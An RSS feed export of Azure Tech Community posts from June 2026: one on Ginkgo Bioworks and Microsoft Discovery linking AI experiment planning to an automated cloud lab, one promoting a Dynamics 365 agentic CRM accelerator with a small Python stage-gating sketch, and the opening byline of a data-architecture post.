<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>rss.livelink.threads-in-node</title>
    <link>https://techcommunity.microsoft.com/t5/azure/ct-p/Azure</link>
    <description>rss.livelink.threads-in-node</description>
    <pubDate>Wed, 10 Jun 2026 00:29:53 GMT</pubDate>
    <dc:creator>Azure</dc:creator>
    <dc:date>2026-06-10T00:29:53Z</dc:date>
    <item>
      <title>Ginkgo Bioworks and Microsoft Discovery: Bringing agentic AI to biological discovery</title>
      <link>https://techcommunity.microsoft.com/t5/azure-infrastructure-blog/ginkgo-bioworks-and-microsoft-discovery-bringing-agentic-ai-to/ba-p/4526550</link>
      <description>&lt;H1&gt;&lt;SPAN class="lia-text-color-21"&gt;Introduction&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P&gt;Biological discovery is inherently iterative and non-linear. Progress comes through cycles of hypothesis, experimentation, refinement, and review across data, tools, and teams. At Microsoft Build 2026, Microsoft &lt;A href="https://azure.microsoft.com/en-us/blog/announcing-microsoft-discovery-general-availability-and-microsoft-discovery-app-preview/" target="_blank" rel="noopener"&gt;announced general availability of Microsoft Discovery&lt;/A&gt; to support exactly this kind of work, as a comprehensive platform for building and governing agentic AI workflows across scientific and engineering disciplines. That vision becomes especially powerful in collaboration with &lt;A href="https://www.ginkgo.bio/" target="_blank" rel="noopener"&gt;Ginkgo Bioworks&lt;/A&gt;. The goal is to enable researchers to scope and plan experiments in Microsoft Discovery and run them directly on &lt;A href="https://cloud.ginkgo.bio/" target="_blank" rel="noopener"&gt;Ginkgo Cloud Lab&lt;/A&gt;, without requiring in-house automation.&lt;/P&gt;
&lt;P&gt;This collaboration brings together complementary strengths. Microsoft Discovery provides the reasoning, orchestration, and compute layer for scientific work: helping researchers turn goals into structured workflows that connect data, models, tools, and evidence. Ginkgo Bioworks contributes autonomous laboratory infrastructure that can execute those workflows and return results for analysis.&lt;/P&gt;
&lt;P&gt;Together, this creates a lab-in-the-loop model for biological research. The workflow is traditionally described as a continuous Design–Make–Test–Analyze loop, in which scientists generate an experiment plan, hand off validated protocols for lab execution, and then learn from the resulting data to inform the next step. Rather than treating experimentation as a disconnected process, the interplay between Microsoft Discovery and Ginkgo’s agentic system is designed to create a tighter connection between scientific reasoning and real-world validation.&lt;/P&gt;
&lt;H1&gt;&lt;SPAN class="lia-text-color-21"&gt;Integration&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P&gt;One example of this tighter reasoning loop, currently under development, is an RNA design-to-data workflow. In this scenario, Microsoft Discovery uses AI agents to help plan and scope the experiment, while Ginkgo’s automated lab synthesizes DNA templates, performs in vitro transcription, purifies the product, quantifies yield and purity, and returns the resulting data for downstream analysis. In addition, Ginkgo Cloud Lab gives users full transparency on the cost of the experiment before any lab work begins.&lt;/P&gt;
&lt;div data-video-id="https://www.youtube.com/shorts/4b_MCvIqzvE/1780954852794" data-video-remote-vid="https://www.youtube.com/shorts/4b_MCvIqzvE/1780954852794" class="lia-video-container lia-media-is-center lia-media-size-large"&gt;&lt;iframe src="https://www.youtube.com/embed/4b_MCvIqzvE?feature=oembed" allowfullscreen="" style="max-width: 100%"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;P&gt;Here is a walk-through of a project that estimates the cost of RNA design, illustrating how customers can use Microsoft Discovery with Ginkgo’s RNA production offering:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Describe the experiment in natural language&lt;/LI&gt;
&lt;LI&gt;Provide any additional information if required&lt;/LI&gt;
&lt;LI&gt;Validate the cost estimate of the Ginkgo Cloud Lab service&lt;/LI&gt;
&lt;LI&gt;Place the order&lt;/LI&gt;
&lt;LI&gt;Store the results and share&lt;/LI&gt;
&lt;/OL&gt;
&lt;H1&gt;&lt;SPAN class="lia-text-color-21"&gt;Conclusion&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P&gt;This is a real-world Design–Make–Test–Analyze use case that demonstrates how agentic workflows can adapt based on experimental results and accelerate R&amp;amp;D compared with more manual approaches. This matters because modern life sciences teams need more than isolated predictions. They need workflows that connect long-term scientific context, biological data, experimental design, and validation while preserving transparency and keeping experts in control. The collaboration with Ginkgo Bioworks extends that approach into biological experimentation. It also reflects a broader principle behind Microsoft Discovery: extensibility. Microsoft Discovery is a platform that can connect Microsoft innovations with partner tools, models, and datasets. In this case, that means pairing Microsoft Discovery’s agentic orchestration with Ginkgo’s autonomous lab execution to support a more connected model for biological discovery.&lt;/P&gt;
&lt;P&gt;&lt;EM&gt;“Together, agentic AI and autonomous labs will change every part of the scientific process. Iteration cycles will get faster, experiments will require less manual hands-on time, and computational analyses will become more systematic and exhaustive. By making both easier to use, Microsoft and Ginkgo aim to bring greater speed, scale and reproducibility to pre-clinical research.”&lt;/EM&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;— Jason Kelly, CEO, Ginkgo Bioworks&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;By connecting agentic AI with autonomous experimentation, Ginkgo Bioworks and Microsoft are working toward a future in which researchers can move from hypothesis to insight with greater speed, scale, and reproducibility.&lt;/P&gt;
&lt;P&gt;For more information on Microsoft Discovery, &lt;A href="https://azure.microsoft.com/en-us/solutions/discovery/" target="_blank" rel="noopener"&gt;click here&lt;/A&gt;.&lt;/P&gt;
&lt;P&gt;For more information on Ginkgo Bioworks, &lt;A href="https://www.ginkgo.bio/" target="_blank" rel="noopener"&gt;click here&lt;/A&gt;.&lt;/P&gt;</description>
      <pubDate>Tue, 09 Jun 2026 19:00:00 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-infrastructure-blog/ginkgo-bioworks-and-microsoft-discovery-bringing-agentic-ai-to/ba-p/4526550</guid>
      <dc:creator>NihitPokhrel</dc:creator>
      <dc:date>2026-06-09T19:00:00Z</dc:date>
    </item>
    <item>
      <title>From AI Suggestions to Autonomous CRM Actions in Dynamics 365</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-developer-community/from-ai-suggestions-to-autonomous-crm-actions-in-dynamics-365/ba-p/4524477</link>
      <description>
&lt;H2&gt;🔷 Executive Summary&lt;/H2&gt;
&lt;P&gt;Most AI implementations in Dynamics 365 start—and end—with case summarization.&lt;/P&gt;
&lt;P&gt;While useful, summarization alone does not fundamentally transform service operations.&lt;/P&gt;
&lt;P&gt;In this post, I’ll walk through a &lt;STRONG&gt;CRM Copilot Agent Accelerator&lt;/STRONG&gt; built on Microsoft Power Platform that goes far beyond summarization. It introduces a &lt;STRONG&gt;modular, extensible AI architecture&lt;/STRONG&gt; that evolves from:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;AI-generated insights&lt;/LI&gt;
&lt;LI&gt;to predictive intelligence&lt;/LI&gt;
&lt;LI&gt;to autonomous execution&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This approach enables organizations to reduce manual effort, improve decision quality, and scale support operations without additional Copilot licensing.&lt;/P&gt;
&lt;H2&gt;🔷 The Business Problem&lt;/H2&gt;
&lt;P&gt;In most enterprise service operations:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Agents spend &lt;STRONG&gt;30–40% of their time on repetitive tasks&lt;/STRONG&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;Case triage requires manual reading of history&lt;/LI&gt;
&lt;LI&gt;Decisions vary significantly between agents&lt;/LI&gt;
&lt;LI&gt;Knowledge base usage is inconsistent&lt;/LI&gt;
&lt;LI&gt;Escalations are reactive rather than predictive&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The result?&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Slower resolutions&lt;/LI&gt;
&lt;LI&gt;Increased SLA breaches&lt;/LI&gt;
&lt;LI&gt;Poor customer experience&lt;/LI&gt;
&lt;LI&gt;High onboarding time for new agents&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;🔷 Solution Overview: CRM Copilot Agent Accelerator&lt;/H2&gt;
&lt;P&gt;The solution introduces a &lt;STRONG&gt;layered AI-first architecture&lt;/STRONG&gt; built on:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Dynamics 365 + Dataverse&lt;/STRONG&gt; (data foundation)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Power Automate&lt;/STRONG&gt; (orchestration)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;AI Builder (GPT models)&lt;/STRONG&gt; (intelligence layer)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;PCF Controls + Teams integration&lt;/STRONG&gt; (user experience)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;At its core, the accelerator:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Generates &lt;STRONG&gt;AI summaries + next actions&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI&gt;Stores them in Dataverse (persistent &amp;amp; reusable)&lt;/LI&gt;
&lt;LI&gt;Extends capabilities through &lt;STRONG&gt;modular add-on packs&lt;/STRONG&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 These add-ons transform AI from a helper into an operational engine.&lt;/P&gt;
&lt;H2&gt;🔷 Architecture Overview&lt;/H2&gt;
&lt;P&gt;The solution follows a &lt;STRONG&gt;layered enterprise architecture model&lt;/STRONG&gt;:&lt;/P&gt;
&lt;H3&gt;1. Trigger Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;Case create/update&lt;/LI&gt;
&lt;LI&gt;Email, chat, or call events&lt;/LI&gt;
&lt;LI&gt;SLA checkpoints&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;2. Orchestration Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;Power Automate flows&lt;/LI&gt;
&lt;LI&gt;Dataverse plugins&lt;/LI&gt;
&lt;LI&gt;Optional Copilot Studio agents&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;3. AI Processing Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;AI Builder prompts (summarization, classification)&lt;/LI&gt;
&lt;LI&gt;Sentiment detection&lt;/LI&gt;
&lt;LI&gt;Risk prediction&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;4. Data Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;Dataverse entities (Case, Account, Knowledge Base)&lt;/LI&gt;
&lt;LI&gt;AI-enriched fields&lt;/LI&gt;
&lt;LI&gt;Analytics tables&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;5. Experience Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;Model-driven apps&lt;/LI&gt;
&lt;LI&gt;PCF widgets&lt;/LI&gt;
&lt;LI&gt;Teams Adaptive Cards&lt;/LI&gt;
&lt;LI&gt;Power BI dashboards&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 This architecture allows &lt;STRONG&gt;scalable AI enrichment across the entire CRM lifecycle&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;🔷 The Real Innovation: Modular Add-On Packs&lt;/H2&gt;
&lt;P&gt;The real differentiation is not the base AI capability.&lt;/P&gt;
&lt;P&gt;It is the introduction of &lt;STRONG&gt;eight independently deployable add-on packs&lt;/STRONG&gt;.&lt;/P&gt;
&lt;H3&gt;🔹 Key Add-On Categories&lt;/H3&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th&gt;Add-On&lt;/th&gt;&lt;th&gt;Capability&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;PCF Widgets&lt;/td&gt;&lt;td&gt;Visual AI insights (risk radar, similar cases)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Predictive Engine&lt;/td&gt;&lt;td&gt;SLA &amp;amp; escalation prediction&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Teams Integration&lt;/td&gt;&lt;td&gt;AI insights pushed to Teams&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Customer 360&lt;/td&gt;&lt;td&gt;Persona + churn intelligence&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Knowledge Intelligence&lt;/td&gt;&lt;td&gt;Self-improving KB loop&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Multilingual AI&lt;/td&gt;&lt;td&gt;Cross-language support&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Voice &amp;amp; Omnichannel&lt;/td&gt;&lt;td&gt;Call/chat AI summarization&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Agentic Automation&lt;/td&gt;&lt;td&gt;AI takes action automatically&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;👉 These packs address &lt;STRONG&gt;10+ gaps not covered by D365 Copilot&lt;/STRONG&gt;&amp;nbsp;&lt;/P&gt;
&lt;H2&gt;🔷 Deep Dive: Key Differentiators&lt;/H2&gt;
&lt;H3&gt;1. From Reactive to Predictive AI&lt;/H3&gt;
&lt;P&gt;Instead of reacting to issues:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;SLA breach risk is calculated in real time&lt;/LI&gt;
&lt;LI&gt;Escalation probability is predicted before it happens&lt;/LI&gt;
&lt;LI&gt;Supervisors receive proactive alerts&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 This can reduce escalations by &lt;STRONG&gt;25–40%&lt;/STRONG&gt;&lt;/P&gt;
&lt;H3&gt;2. Visual AI Experience (PCF Controls)&lt;/H3&gt;
&lt;P&gt;Instead of text-heavy UI:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Radar charts show case complexity &amp;amp; risk&lt;/LI&gt;
&lt;LI&gt;Similar case panels enable faster resolution&lt;/LI&gt;
&lt;LI&gt;Coaching tickers keep guidance always visible&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 This dramatically improves &lt;STRONG&gt;agent usability and adoption&lt;/STRONG&gt;&lt;/P&gt;
&lt;H3&gt;3. Self-Improving Knowledge Base&lt;/H3&gt;
&lt;P&gt;A major gap in most systems:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Knowledge is consumed but never improved&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This solution:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Detects KB gaps automatically&lt;/LI&gt;
&lt;LI&gt;Generates AI-drafted knowledge articles&lt;/LI&gt;
&lt;LI&gt;Enables continuous learning&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 Leads to &lt;STRONG&gt;3× growth in KB coverage&lt;/STRONG&gt;&amp;nbsp;&lt;/P&gt;
&lt;H3&gt;4. From AI Suggestion → AI Action&lt;/H3&gt;
&lt;P&gt;Most AI stops at suggestion.&lt;/P&gt;
&lt;P&gt;This accelerator evolves into &lt;STRONG&gt;Agentic AI&lt;/STRONG&gt;:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th&gt;Stage&lt;/th&gt;&lt;th&gt;Capability&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Informs&lt;/td&gt;&lt;td&gt;Summary + Insights&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Suggests&lt;/td&gt;&lt;td&gt;Recommendations&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Drafts&lt;/td&gt;&lt;td&gt;Email + KB articles&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Acts&lt;/td&gt;&lt;td&gt;Tasks, routing, execution&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Orchestrates&lt;/td&gt;&lt;td&gt;Multi-agent automation&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;👉 AI starts doing the work — not just guiding it&lt;/P&gt;
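&lt;P&gt;The staged progression in the table can be sketched as a simple gate that decides which operations an environment permits. This is a minimal illustration, not the accelerator's actual implementation: the operation names, the &lt;CODE&gt;REQUIRED_STAGE&lt;/CODE&gt; mapping, and the assumption that each stage includes every earlier stage are all hypothetical.&lt;/P&gt;
&lt;PRE&gt;
```python
from enum import IntEnum


class Stage(IntEnum):
    """Autonomy stages from the table, ordered from least to most autonomous."""
    INFORMS = 1
    SUGGESTS = 2
    DRAFTS = 3
    ACTS = 4
    ORCHESTRATES = 5


# Hypothetical mapping of each operation to the stage that first enables it.
REQUIRED_STAGE = {
    "summarize_case": Stage.INFORMS,
    "recommend_next_action": Stage.SUGGESTS,
    "draft_email": Stage.DRAFTS,
    "create_task": Stage.ACTS,
    "route_case": Stage.ACTS,
    "run_multi_agent_flow": Stage.ORCHESTRATES,
}


def is_enabled(required, enabled):
    """True when the required stage is at or below the enabled stage."""
    return required.value in range(1, enabled.value + 1)


def allowed_operations(enabled):
    """Return the sorted operation names permitted at the enabled stage."""
    return sorted(
        name
        for name, required in REQUIRED_STAGE.items()
        if is_enabled(required, enabled)
    )


print(allowed_operations(Stage.DRAFTS))
```
&lt;/PRE&gt;
&lt;P&gt;Raising the enabled stage one step at a time lets a team review AI output at each level before granting it the ability to act on records.&lt;/P&gt;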
&lt;H2&gt;🔷 Business Impact&lt;/H2&gt;
&lt;P&gt;Organizations adopting this accelerator can expect:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;✅ &lt;STRONG&gt;90% reduction in case triage time&lt;/STRONG&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;✅ &lt;STRONG&gt;40% reduction in misrouted cases&lt;/STRONG&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;✅ &lt;STRONG&gt;60–70% improvement in handling efficiency&lt;/STRONG&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;✅ Faster agent onboarding (less than a day)&lt;/LI&gt;
&lt;LI&gt;✅ Reduced dependency on Copilot licensing&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 All achieved using &lt;STRONG&gt;existing Power Platform investments&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;🔷 Future Roadmap&lt;/H2&gt;
&lt;P&gt;The current solution sets the foundation for:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;✅ Copilot Studio multi-agent orchestration&lt;/LI&gt;
&lt;LI&gt;✅ Advanced ML-based predictions&lt;/LI&gt;
&lt;LI&gt;✅ Vector-based knowledge retrieval (RAG)&lt;/LI&gt;
&lt;LI&gt;✅ Integration with Microsoft Fabric for intelligence&lt;/LI&gt;
&lt;LI&gt;✅ Autonomous CRM workflows&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 The evolution leads toward &lt;STRONG&gt;fully AI-driven service operations&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;🔷 Why This Matters&lt;/H2&gt;
&lt;P&gt;This is not just another AI demo.&lt;/P&gt;
&lt;P&gt;It represents a shift from:&lt;/P&gt;
&lt;P&gt;❌ “AI helps agents”&lt;BR /&gt;➡️ ✅ “AI becomes part of the operation”&lt;/P&gt;
&lt;P&gt;And does so using:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;No custom AI infrastructure&lt;/LI&gt;
&lt;LI&gt;No additional Copilot licensing&lt;/LI&gt;
&lt;LI&gt;Native Microsoft ecosystem&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;🔷 Call to Action&lt;/H2&gt;
&lt;P&gt;If you’re working on Dynamics 365, Power Platform, or AI-driven CRM solutions:&lt;/P&gt;
&lt;P&gt;✅ Start with AI enrichment&lt;BR /&gt;✅ Extend with predictive capabilities&lt;BR /&gt;✅ Move toward agentic automation&lt;/P&gt;
&lt;P&gt;This accelerator pattern can help you &lt;STRONG&gt;move faster, scale better, and deliver measurable value&lt;/STRONG&gt;.&lt;/P&gt;
&lt;H2&gt;🔷 Closing Thought&lt;/H2&gt;
&lt;P&gt;“The future of CRM is not AI assisting users —&lt;BR /&gt;it is AI transforming how work gets done.”&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;
&lt;H2&gt;🔷 References &amp;amp; Further Reading&lt;/H2&gt;
&lt;P&gt;The concepts described in this CRM Copilot Agent Accelerator are built on capabilities available across Microsoft Dynamics 365, Dataverse, Power Platform, Azure AI, and Copilot technologies.&lt;/P&gt;
&lt;P&gt;Official Microsoft references:&lt;/P&gt;
&lt;P&gt;📌 Dynamics 365 Customer Service&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-service/?utm_source=chatgpt.com" target="_blank"&gt;Dynamics 365 Customer Service Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-service/overview?utm_source=chatgpt.com" target="_blank"&gt;Dynamics 365 Customer Service Overview&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Microsoft Dataverse&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-apps/maker/data-platform/data-platform-intro?utm_source=chatgpt.com" target="_blank"&gt;Microsoft Dataverse Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-apps/developer/data-platform/overview?utm_source=chatgpt.com" target="_blank"&gt;Dataverse Developer Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Power Automate&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-automate/?utm_source=chatgpt.com" target="_blank"&gt;Power Automate Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-automate/getting-started?utm_source=chatgpt.com" target="_blank"&gt;Build Automated Workflows with Power Automate&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 AI Builder&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/ai-builder/?utm_source=chatgpt.com" target="_blank"&gt;AI Builder Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/ai-builder/create-a-custom-prompt?utm_source=chatgpt.com" target="_blank"&gt;Create and Use AI Prompts in Power Platform&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Microsoft Copilot Studio&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/microsoft-copilot-studio/?utm_source=chatgpt.com" target="_blank"&gt;Microsoft Copilot Studio Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/microsoft-copilot-studio/authoring-create-agent?utm_source=chatgpt.com" target="_blank"&gt;Build Autonomous Agents with Copilot Studio&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Power Apps Component Framework (PCF)&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-apps/developer/component-framework/overview?utm_source=chatgpt.com" target="_blank"&gt;Power Apps Component Framework Overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-apps/developer/component-framework/create-custom-controls-using-pcf?utm_source=chatgpt.com" target="_blank"&gt;Build Code Components for Model-Driven Apps&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Microsoft Teams Integration&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customerengagement/on-premises/admin/use-dynamics-365-microsoft-teams-collaborate?utm_source=chatgpt.com" target="_blank"&gt;Integrate Dynamics 365 with Microsoft Teams&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/microsoftteams/platform/task-modules-and-cards/cards/cards-reference?utm_source=chatgpt.com" target="_blank"&gt;Teams Adaptive Cards Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Omnichannel &amp;amp; Conversational AI&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/contact-center/?utm_source=chatgpt.com" target="_blank"&gt;Dynamics 365 Contact Center Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-service/implement/omnichannel/overview?utm_source=chatgpt.com" target="_blank"&gt;Omnichannel for Customer Service Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Customer Insights &amp;amp; Customer 360&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-insights/?utm_source=chatgpt.com" target="_blank"&gt;Dynamics 365 Customer Insights Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Knowledge Management&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-service/knowledge-base-overview?utm_source=chatgpt.com" target="_blank"&gt;Knowledge Management in Dynamics 365 Customer Service&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Power BI Analytics&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-bi/?utm_source=chatgpt.com" target="_blank"&gt;Power BI Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Azure AI &amp;amp; Generative AI&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/ai-services/?utm_source=chatgpt.com" target="_blank"&gt;Azure AI Services Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/ai-services/openai/overview?utm_source=chatgpt.com" target="_blank"&gt;Azure OpenAI Service Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Retrieval-Augmented Generation (RAG)&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/search/search-what-is-azure-search?utm_source=chatgpt.com" target="_blank"&gt;Azure AI Search Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/search/retrieval-augmented-generation-overview?utm_source=chatgpt.com" target="_blank"&gt;Build RAG Solutions with Azure AI Search and Azure OpenAI&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Microsoft Fabric&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/fabric/?utm_source=chatgpt.com" target="_blank"&gt;Microsoft Fabric Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Power Platform Architecture &amp;amp; Well-Architected Guidance&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-platform/well-architected/?utm_source=chatgpt.com" target="_blank"&gt;Power Platform Well-Architected Framework&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-platform/architecture/?utm_source=chatgpt.com" target="_blank"&gt;Power Platform Architecture Center&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;These resources provide the foundational building blocks for implementing AI-assisted, predictive, and agentic experiences across Dynamics 365 Customer Service and the broader Microsoft Power Platform ecosystem.&lt;/P&gt;</description>
      <pubDate>Tue, 09 Jun 2026 16:39:43 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-developer-community/from-ai-suggestions-to-autonomous-crm-actions-in-dynamics-365/ba-p/4524477</guid>
      <dc:creator>SachinDas</dc:creator>
      <dc:date>2026-06-09T16:39:43Z</dc:date>
    </item>
    <item>
      <title>Streaming and Batch Data Architectures with Microsoft Fabric to Azure Databricks</title>
      <link>https://techcommunity.microsoft.com/t5/analytics-on-azure-blog/streaming-and-batch-data-architectures-with-microsoft-fabric-to/ba-p/4526166</link>
      <description>&lt;P&gt;Authors: Oscar Alvarado &lt;a href="javascript:void(0)" data-lia-user-mentions="" data-lia-user-uid="2298967" data-lia-user-login="oscaralvarado" class="lia-mention lia-mention-user"&gt;oscaralvarado&lt;/a&gt; and Rafia Aqil &lt;a href="javascript:void(0)" data-lia-user-mentions="" data-lia-user-uid="3072440" data-lia-user-login="Rafia_Aqil" class="lia-mention lia-mention-user"&gt;Rafia_Aqil&lt;/a&gt;&lt;/P&gt;
